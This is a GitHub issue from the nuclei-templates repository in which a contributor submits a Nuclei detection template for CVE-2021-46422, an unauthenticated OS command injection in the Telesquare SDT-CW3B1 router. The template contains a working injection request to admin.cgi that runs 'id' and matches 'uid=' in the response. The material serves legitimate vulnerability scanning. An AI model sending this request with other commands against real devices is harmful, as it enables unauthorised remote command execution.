projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.

Home Page:https://github.com/projectdiscovery/nuclei

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2021-46422

badboycxcc opened this issue · comments

Template Information:

Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.

Nuclei Template:

id: CVE-2021-46422

info:
  name: SDT-CW3B1 1.1.0 - OS command injection
  author: remote
  severity: high
  reference: 
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46422
    - https://www.exploit-db.com/exploits/50936
  tags: cve,cve2021
  classification:
    cve-id: CVE-2021-46422

requests:
  - method: GET
    path:
      - "{{RootURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{exploit}}"

    payloads:
      exploit:
        - "id"
    attack: pitchfork
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=.*"

Hello @badboycxcc, I have made a few changes to the template. I have also moved the payload to variables since the payloads are not intended to be used as attack vectors, but rather as a wordlist for various attack types.

Thank you so much for sharing this template with the community and contributing to this project 🍻

ok!